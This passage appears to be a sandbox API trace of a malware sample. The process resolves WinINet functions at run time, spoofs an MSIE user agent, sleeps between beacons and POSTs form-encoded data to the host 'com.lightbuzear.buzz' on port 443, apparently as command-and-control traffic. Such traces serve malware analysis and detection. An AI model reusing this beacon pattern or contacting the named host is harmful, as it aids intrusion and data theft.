(lpModuleName="Wininet.dll") returned 0x71570000 [0185.881] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0185.881] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce710 [0185.881] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0185.881] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6c0 [0185.881] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0185.882] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0185.882] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0185.882] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce640 [0185.882] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0185.882] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0848 [0185.882] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0185.882] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f880 [0185.882] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0848 | out: hHeap=0x4780000) returned 1 [0185.882] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0185.882] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f880 | out: hHeap=0x4780000) returned 1 [0185.882] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47f9ed8 [0185.882] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0185.882] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0185.882] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9ed8 | out: hHeap=0x4780000) returned 1 [0185.882] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9fc8 [0185.882] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0185.882] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9ed8 [0185.882] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0185.883] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0185.883] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0185.883] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0185.883] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9ed8 | out: hHeap=0x4780000) returned 1 [0185.884] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0185.884] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5b0 [0185.884] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5e0 [0185.884] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0185.884] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce630 [0185.884] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0185.884] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5b0 [0185.884] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0185.884] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce750 [0185.884] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0185.884] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0848 [0185.884] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0185.884] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fa90 [0185.884] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0848 | out: hHeap=0x4780000) returned 1 [0185.884] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0185.884] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fa90 | out: hHeap=0x4780000) returned 1 [0185.884] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47f9ed8 [0185.884] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0185.884] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0185.884] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9ed8 | out: hHeap=0x4780000) returned 1 [0185.884] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9ed8 [0185.884] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd30 [0185.884] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9f00 [0185.885] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0185.885] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0185.885] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0185.885] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0185.885] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9f00 | out: hHeap=0x4780000) returned 1 [0185.886] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0185.886] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0185.886] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0185.886] FreeLibrary (hLibModule=0x71570000) returned 1 [0185.886] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0185.886] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0185.886] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f178 | out: hHeap=0x4780000) returned 1 [0185.886] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f150 | out: hHeap=0x4780000) returned 1 [0185.887] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f380 | out: hHeap=0x4780000) returned 1 [0185.887] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f5b0 | out: hHeap=0x4780000) returned 1 [0185.887] Sleep (dwMilliseconds=0x2710) [0185.921] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce750 [0185.921] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce740 [0185.921] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0185.921] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0185.921] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0185.921] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce740 [0185.921] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0185.921] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce620 [0185.921] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0185.921] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0b48 [0185.921] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0185.921] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0848 [0185.921] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0b48 | out: hHeap=0x4780000) returned 1 [0185.921] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0185.921] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0848 | out: hHeap=0x4780000) returned 1 [0185.921] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x47f0a58 [0185.921] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9f00 [0185.922] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9f00 | out: hHeap=0x4780000) returned 1 [0185.922] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0185.922] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9f00 [0185.922] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0185.922] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5c0 [0185.922] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce640 [0185.923] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0185.923] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce570 [0185.923] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0185.923] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0185.923] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0185.923] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6c0 [0185.923] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0185.923] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0848 [0185.923] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0185.923] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0b48 [0185.923] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0848 | out: hHeap=0x4780000) returned 1 [0185.923] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0185.923] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0b48 | out: hHeap=0x4780000) returned 1 [0185.923] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47f9f78 [0185.923] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0185.923] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb978 [0185.923] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9f78 | out: hHeap=0x4780000) returned 1 [0185.923] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9f78 [0185.923] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba90 [0185.923] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f5b0 [0185.924] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba90 | out: hHeap=0x4780000) returned 1 [0185.924] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb978 | out: hHeap=0x4780000) returned 1 [0185.924] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0185.924] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0185.925] FreeLibrary (hLibModule=0x71780000) returned 1 [0185.925] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f5b0 | out: hHeap=0x4780000) returned 1 [0185.925] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0185.925] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f5b0 [0185.925] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0185.926] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce640 [0185.926] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce730 [0185.926] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0185.926] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6d0 [0185.926] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0185.926] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0185.926] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0185.926] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0185.926] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0185.926] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0848 [0185.926] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0185.926] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f4780 [0185.926] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0848 | out: hHeap=0x4780000) returned 1 [0185.926] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0185.926] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4780 | out: hHeap=0x4780000) returned 1 [0185.926] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x47f4780 [0185.926] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f498 [0185.927] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f498 | out: hHeap=0x4780000) returned 1 [0185.927] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0185.927] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f380 [0185.927] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0185.927] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f150 [0185.927] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce620 [0185.927] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce740 [0185.927] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0185.927] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce610 [0185.927] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0185.927] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0185.927] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0185.927] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce610 [0185.927] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0185.927] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0848 [0185.927] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0185.928] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fac0 [0185.928] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0848 | out: hHeap=0x4780000) returned 1 [0185.928] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0185.928] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fac0 | out: hHeap=0x4780000) returned 1 [0185.928] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x47f0848 [0185.928] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f498 [0185.928] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f498 | out: hHeap=0x4780000) returned 1 [0185.929] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0185.929] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0185.929] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce620 [0185.929] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce640 [0185.929] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0185.929] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0185.929] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0185.929] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6d0 [0185.929] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0185.929] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce640 [0185.929] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0185.929] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f9a0 [0185.929] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0185.929] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f850 [0185.929] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f9a0 | out: hHeap=0x4780000) returned 1 [0185.929] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0185.929] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f850 | out: hHeap=0x4780000) returned 1 [0185.929] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x481f498 [0185.929] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0185.929] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba90 [0185.929] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f498 | out: hHeap=0x4780000) returned 1 [0185.929] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f178 [0185.929] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0185.929] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f498 [0185.930] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0185.930] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba90 | out: hHeap=0x4780000) returned 1 [0185.930] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0185.930] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0185.931] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f498 | out: hHeap=0x4780000) returned 1 [0185.931] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0185.931] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0185.931] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0185.931] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce620 [0185.931] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0185.931] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce630 [0185.931] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0185.931] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0185.931] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0185.931] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f928 [0185.931] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0185.931] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f880 [0185.931] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f928 | out: hHeap=0x4780000) returned 1 [0185.931] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0185.931] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f880 | out: hHeap=0x4780000) returned 1 [0185.931] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x481f498 [0185.931] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0185.931] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0185.932] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f498 | out: hHeap=0x4780000) returned 1 [0185.932] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f498 [0185.932] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0185.932] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0c78 [0185.932] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0185.964] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0185.964] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0185.965] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0187.265] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0c78 | out: hHeap=0x4780000) returned 1 [0187.265] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0187.265] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce630 [0187.266] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0187.266] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0187.266] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6e0 [0187.266] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0187.266] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce570 [0187.266] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0187.266] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6b0 [0187.266] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0187.266] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6a0 [0187.266] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0187.266] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f9b8 [0187.266] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0187.266] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fad8 [0187.266] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f9b8 | out: hHeap=0x4780000) returned 1 [0187.266] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0187.266] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fad8 | out: hHeap=0x4780000) returned 1 [0187.267] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47a0d18 [0187.267] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0187.267] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba20 [0187.267] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0d18 | out: hHeap=0x4780000) returned 1 [0187.267] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0c78 [0187.267] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0187.267] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0d18 [0187.267] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0187.267] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0187.268] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0187.268] InternetReadFile (in: 